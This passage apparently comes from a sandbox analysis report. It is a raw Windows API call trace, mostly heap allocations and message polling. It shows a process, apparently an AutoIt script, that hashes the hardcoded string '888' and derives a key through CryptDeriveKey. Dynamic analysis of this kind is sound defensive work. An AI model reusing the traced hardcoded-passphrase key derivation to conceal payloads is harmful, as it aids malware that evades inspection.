lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0263.644] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0263.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0263.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0263.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0263.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0263.645] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.646] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0263.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51d48 [0263.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51d48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0263.646] CryptHashData (hHash=0xa87410, pbData=0x2e55108, dwDataLen=0x3, dwFlags=0x1) returned 1 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0263.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0263.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0263.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0263.647] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.647] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0263.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0263.647] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0263.647] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0263.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0263.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0263.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51d90 [0263.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51d90, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0263.649] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87410, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa870d0) returned 1 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0263.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0263.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0263.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0263.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0263.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0263.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0263.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0263.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0263.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0263.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f28 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0263.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f28 | out: hHeap=0x970000) returned 1 [0263.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0263.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0263.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f40 [0263.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f40 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0263.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f148d8 | out: hHeap=0x970000) returned 1 [0263.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0263.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0263.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0263.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0263.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0263.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0263.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0263.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0263.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0263.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0263.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0263.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0263.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0263.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0263.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.656] RtlAllocateHeap 